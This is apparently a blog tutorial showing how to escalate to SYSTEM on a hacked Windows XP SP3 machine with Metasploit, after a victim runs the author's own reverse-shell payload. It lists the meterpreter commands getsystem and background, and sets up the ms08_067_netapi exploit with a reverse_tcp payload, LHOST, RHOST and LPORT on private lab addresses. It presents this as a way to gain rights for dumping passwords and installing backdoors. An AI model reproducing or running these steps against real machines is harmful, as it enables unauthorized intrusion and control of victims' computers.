Privilege Escalation in windows xp using metasploit
03 Jan

Privilege Escalation in windows xp using metasploit

Last post i explained how to get a admin privileges in windows 7 after successful hack,  comparing to that its even more easier in windows XP .

This picture below taken when hacked successfully gain an access using  Payload create by me. For creating your own payload visit by previous post  create a payload in executable.

Screenshot from 2014-06-19 08:45:58

After victims execute by payload i get an access to their system by  start a listener with the multi/handler module  allows Metasploit to listen for reverse shell connections.

Screenshot from 2014-06-19 08:23:26

#meterpreter  >  getuid

When running getuid command, we know that we running as user that already logged in to the system but we didn’t act as system account. How do we do that to escalate our privilege to system account?.

The session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc.

Fortunately, Metasploit has a Meterpreter script, ‘getsystem’, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate   privileges.

#meterpreter  >  use priv

# #meterpreter  >   getsystem

make use of the ‘getsystem’ command, if its not already loaded we will need to first load the ‘priv’ extension.

We will let Metasploit try to do the heavy lifting for us by running “getsystem” without any options. The script will attempt every method available to it, stopping when it succeeds.

There are situations where getsystem fails depending upon the operating system and exploiting method  we are using.

For this tutorial we are exploiting windows XP SP3 as a victim’s machine and by executing a sysinfo command in your meterpeter shell you will get informations about your exploiting system.

#meterpreter  >   sysinfo

When we executing  getsystem  command  it will fail because the  current logged user have not enough privilege to get admin roles.

For that  we need to background the session, and manually  try some other  exploit  ( I used smb/netapi )  and load the session recently backgrounded and then exploit and execute  getsystem to get admin privilege.

#meterpreter  > background

#meterpreter  >   use exploit/windows/smb/ms08_067_netapi

I exploited this machine with the payload i created before,  so try the  method you used  for exploiting the machine before.

#meterpreter  >   set payload windows/meterpreter/reverse_tcp

#meterpreter  > set   LHOST 192.168.31.20

#meterpreter  > set   LPORT  8080

#meterpreter  >  set RHOST 192.168.31.3

#meterpreter  >   set   SESSION 1

#meterpreter  >    exploit

Screenshot from 2014-06-19 08:24:36

In this above image we are getting access to Admin system user  acount  with more privileges, by executing post/windows/gather/win_privs command it will list the privilege of the current users logged in.

#meterpreter  >     run  post/windows/gather/win_privs

Screenshot from 2014-06-19 08:26:22

Original Link

Comments are closed.